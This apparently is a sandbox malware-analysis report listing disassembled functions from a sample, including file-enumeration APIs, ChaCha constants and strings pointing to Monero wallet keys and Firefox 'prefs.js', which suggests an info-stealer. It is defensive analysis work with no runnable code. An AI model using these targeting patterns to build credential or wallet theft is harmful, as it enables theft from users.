Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Find$FileHeaplstrcatlstrlen$AllocateCloseFirstNextProcesswsprintf
String ID: %s\%s$%s\*
API String ID: 671575355-2848263008
Opcode ID: b1757ffdaeeeab974c3476efbfafc21a228ec5503efae052c3738514c13e7d5c
Instruction ID: 99b7152c738ccaf65423c5e4a6f153b58f852def7467f090446b72950a58e1a9
Opcode Fuzzy Hash: b1757ffdaeeeab974c3476efbfafc21a228ec5503efae052c3738514c13e7d5c
Instruction Fuzzy Hash: A55153B19002189BCB24EB74EC99FED77BCAB58700F4055D8F649A6084EB75DB84CF91

Function 00E240F0 Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 133fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00E24113
FindFirstFileA.KERNEL32(?,?), ref: 00E2412A
StrCmpCA.SHLWAPI(?,00E30F94), ref: 00E24158
StrCmpCA.SHLWAPI(?,00E30F98), ref: 00E2416E
FindNextFileA.KERNEL32(000000FF,?), ref: 00E242BC
FindClose.KERNEL32(000000FF), ref: 00E242D1

Strings

%s\%s, xrefs: 00E24107

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\%s
API String ID: 180737720-4073750446
Opcode ID: 680fdccb8302b45e837d2c7271eed1d9afa9f0552a5e4b6f03273b6f67f08947
Instruction ID: 1ec9f1e32b9e26dd9545faa71f7b5c6a3ee2192e22398ec088c54d72cecfb870
Opcode Fuzzy Hash: 680fdccb8302b45e837d2c7271eed1d9afa9f0552a5e4b6f03273b6f67f08947
Instruction Fuzzy Hash: 805169B6900218ABCB34EBB0ED45EEA73BCBB54700F4055DDF649A6084DB759B85CF90

Function 00E1EE20 Relevance: 17.9, APIs: 9, Strings: 1, Instructions: 369fileCOMMON

Download Yara Rule

APIs

wsprintfA.USER32 ref: 00E1EE3E
FindFirstFileA.KERNEL32(?,?), ref: 00E1EE55
StrCmpCA.SHLWAPI(?,00E31630), ref: 00E1EEAB
StrCmpCA.SHLWAPI(?,00E31634), ref: 00E1EEC1
FindNextFileA.KERNEL32(000000FF,?), ref: 00E1F3AE
FindClose.KERNEL32(000000FF), ref: 00E1F3C3

Strings

%s\*.*, xrefs: 00E1EE32

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Find$File$CloseFirstNextwsprintf
String ID: %s\*.*
API String ID: 180737720-1013718255
Opcode ID: 81d3ed19f656fc565dd58cc19e6d10b052f493d2b682bfed6b3defc6bc99fc51
Instruction ID: aa6ac95d41c5733a93bae60c9bde6bc4a7a18b8677c8aa8247a61b8037edee93
Opcode Fuzzy Hash: 81d3ed19f656fc565dd58cc19e6d10b052f493d2b682bfed6b3defc6bc99fc51
Instruction Fuzzy Hash: 88E110729111289BDB54FB60ED62EEE73BDAF54300F4855E9B40A72092EE306F89CF51

Function 00E50098 Relevance: 17.4, Strings: 13, Instructions: 1151COMMON

Download Yara Rule

Strings

te knd 3expand 32-by, xrefs: 00E5034E
expa, xrefs: 00E50461
2-by, xrefs: 00E5036E
te k, xrefs: 00E5053E
expand 32-by, xrefs: 00E503C8
2-byexpa, xrefs: 00E50355
2-by, xrefs: 00E500F6
te k, xrefs: 00E503B4
nd 32-by, xrefs: 00E504B4
expa, xrefs: 00E505BB
te k, xrefs: 00E50347
expand 3, xrefs: 00E504E5
nd 3, xrefs: 00E50117

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: 2-by$2-by$2-byexpa$expa$expa$expand 3$expand 32-by$nd 3$nd 32-by$te k$te k$te k$te knd 3expand 32-by
API String ID: 0-1562099544
Opcode ID: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction ID: 38305e0411b1d5885c8b1d6319d2df50f651d289b61b93998b7f2a43a6d8ba56
Opcode Fuzzy Hash: 74786d5e410390c28444d6ffa7d97e47467e62d2f5ff2becfbe19334c29c47cb
Instruction Fuzzy Hash: BDE276B09083808FD7A4CF29C580B8BFBE1BFC8354F51892EE99997211D770A959CF56

Function 00E1F7B0 Relevance: 16.0, APIs: 8, Strings: 1, Instructions: 275fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E316B0,00E30D97), ref: 00E1F81E
StrCmpCA.SHLWAPI(?,00E316B4), ref: 00E1F86F
StrCmpCA.SHLWAPI(?,00E316B8), ref: 00E1F885
FindNextFileA.KERNEL32(000000FF,?), ref: 00E1FBB1
FindClose.KERNEL32(000000FF), ref: 00E1FBC3

Strings

prefs.js, xrefs: 00E1F912

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID: prefs.js
API String ID: 3334442632-3783873740
Opcode ID: 6f3c034ed48d782be60c404924e93cee1994563f1480166dc5c93d98d1e987c9
Instruction ID: 69889e2a1c7e6c0ffdb106149468770df5a5ce0a7f147d403fda9a3ac285cf84
Opcode Fuzzy Hash: 6f3c034ed48d782be60c404924e93cee1994563f1480166dc5c93d98d1e987c9
Instruction Fuzzy Hash: 9DB122719001289BCB24FF64ED96FED77B9AF54300F4495B8E50A76181EF31AB48CB92

Function 00E11710 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 492fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E3523C,?,?,?,00E352E4,?,?,00000000,?,00000000), ref: 00E11963
StrCmpCA.SHLWAPI(?,00E3538C), ref: 00E119B3
StrCmpCA.SHLWAPI(?,00E35434), ref: 00E119C9
CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00E11D80
DeleteFileA.KERNEL32(00000000), ref: 00E11E0A
FindNextFileA.KERNEL32(000000FF,?), ref: 00E11E60
FindClose.KERNEL32(000000FF), ref: 00E11E72

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

Strings

\*.*, xrefs: 00E11831

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Filelstrcpy$Find$lstrcat$CloseCopyDeleteFirstNextlstrlen
String ID: \*.*
API String ID: 1415058207-1173974218
Opcode ID: 0b156c01b0a76e9b18a36363f5988d64e906ef3f8799a82b2c5c93994244b4c2
Instruction ID: 8952f95297d587a4d8fc0be566917d6f412d1b755f44f03a025602d7e012a631
Opcode Fuzzy Hash: 0b156c01b0a76e9b18a36363f5988d64e906ef3f8799a82b2c5c93994244b4c2
Instruction Fuzzy Hash: 1512E1719101289BCB19FB60EC66EEEB3B9AF54300F4855F9B50676191EF306B88CF51

Function 00E1DF10 Relevance: 14.4, APIs: 7, Strings: 1, Instructions: 370fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,\*.*,00E30C32), ref: 00E1DF5E
StrCmpCA.SHLWAPI(?,00E315C0), ref: 00E1DFAE
StrCmpCA.SHLWAPI(?,00E315C4), ref: 00E1DFC4
FindNextFileA.KERNEL32(000000FF,?), ref: 00E1E4E0
FindClose.KERNEL32(000000FF), ref: 00E1E4F2

Strings

\*.*, xrefs: 00E1DF26

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: Findlstrcpy$File$CloseFirstNextlstrcatlstrlen
String ID: \*.*
API String ID: 2325840235-1173974218
Opcode ID: b83bef8c6897eeec86b1279a637350a8ad28471881825fdda68a9fe9ffd9fc6d
Instruction ID: fabf58c382b98c6c7338764833d002ff159cafee85f3fd1701309aacefc11859
Opcode Fuzzy Hash: b83bef8c6897eeec86b1279a637350a8ad28471881825fdda68a9fe9ffd9fc6d
Instruction Fuzzy Hash: C9F191719141289BCB15FB60DDA6EEEB3B9BF54300F4865E9B40A72091DF306B89CF51

Function 00E1DB80 Relevance: 13.8, APIs: 9, Instructions: 255fileCOMMON

Download Yara Rule

APIs

Part of subcall function 00E2AA50: lstrcpy.KERNEL32(00E30E1A,00000000), ref: 00E2AA98

Part of subcall function 00E2AC30: lstrcpy.KERNEL32(00000000,?), ref: 00E2AC82
Part of subcall function 00E2AC30: lstrcat.KERNEL32(00000000), ref: 00E2AC92

Part of subcall function 00E2ACC0: lstrlen.KERNEL32(?,00998918,?,\Monero\wallet.keys,00E30E1A), ref: 00E2ACD5
Part of subcall function 00E2ACC0: lstrcpy.KERNEL32(00000000), ref: 00E2AD14
Part of subcall function 00E2ACC0: lstrcat.KERNEL32(00000000,00000000), ref: 00E2AD22

Part of subcall function 00E2ABB0: lstrcpy.KERNEL32(?,00E30E1A), ref: 00E2AC15

FindFirstFileA.KERNEL32(00000000,?,00000000,?,?,?,00E315A8,00E30BAF), ref: 00E1DBEB
StrCmpCA.SHLWAPI(?,00E315AC), ref: 00E1DC33
StrCmpCA.SHLWAPI(?,00E315B0), ref: 00E1DC49
FindNextFileA.KERNEL32(000000FF,?), ref: 00E1DECC
FindClose.KERNEL32(000000FF), ref: 00E1DEDE

Memory Dump Source

Source File: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$Find$Filelstrcat$CloseFirstNextlstrlen
String ID:
API String ID: 3334442632-0
Opcode ID: 2cc97e41e2c7b83417411ddef29d2eedd28e415ff8a4257a70bfd69158eed878
Instruction ID: d9c73fcb7ef2a1b21e6f3fd13849bf7a3de697cc62875d225830e62aaa329c95
Opcode Fuzzy Hash: 2cc97e41e2c7b83417411ddef29d2eedd28e415ff8a4257a70bfd69158eed878
Instruction Fuzzy Hash: 2E9145B2A001189BCB14FB74ED979ED73BDAF94340F0459A8F90776185EE349B48CB92

Function 01269E81 Relevance: 12.8, Strings: 9, Instructions: 1586COMMON

Download Yara Rule

Strings

3~, xrefs: 0126A1D4
]!S?, xrefs: 0126A9CA
J[?, xrefs: 0126A110
3Hy, xrefs: 01269F2D
-;w, xrefs: 01269EB6
m`+, xrefs: 0126B0B1
P)[Y, xrefs: 01269FC9
$,7, xrefs: 0126B115
)Xv}, xrefs: 0126A96D

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
String ID: $,7$)Xv}$-;w$3Hy$3~$J[?$P)[Y$]!S?$m`+
API String ID: 0-2745701188
Opcode ID: b1041a91034db655ff571b14f977484cd7a8bb1c97d8de2533933f5c43163741
Instruction ID: a5cc154681a1bf621fea5f4747eb8fb80f6f0c289bf10882b1553f32fe707672
Opcode Fuzzy Hash: b1041a91034db655ff571b14f977484cd7a8bb1c97d8de2533933f5c43163741
Instruction Fuzzy Hash: 19B2E4F3A0C2049FE3046E2DEC8567AFBE5EF94760F1A893DEAC483744E63558058696

Function 0127243E Relevance: 12.8, Strings: 9, Instructions: 1530COMMON

Download Yara Rule

Strings

G#W', xrefs: 012732C4
~Ew, xrefs: 01272EBF
pgn, xrefs: 01272F15
FRW/, xrefs: 012730F2
\}R, xrefs: 012726D3
iuo, xrefs: 01272713
{5Jy, xrefs: 01272F3A
\1^5, xrefs: 0127275C
/W, xrefs: 01272527

Memory Dump Source

Source File: 00000000.00000002.2156567831.00000000010FA000.00000040.00000001.01000000.00000003.sdmp, Offset: 00E10000, based on PE: true

Associated: 00000000.00000002.2156242085.0000000000E10000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E11000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000E3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F4D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F59000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.0000000000F7E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156269642.00000000010E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001281000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001351000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001379000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.0000000001380000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2156567831.000000000138F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157075416.0000000001390000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157227722.0000000001522000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2157253508.0000000001523000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_e10000_file.jbxd

Yara matches

Similarity

API ID:
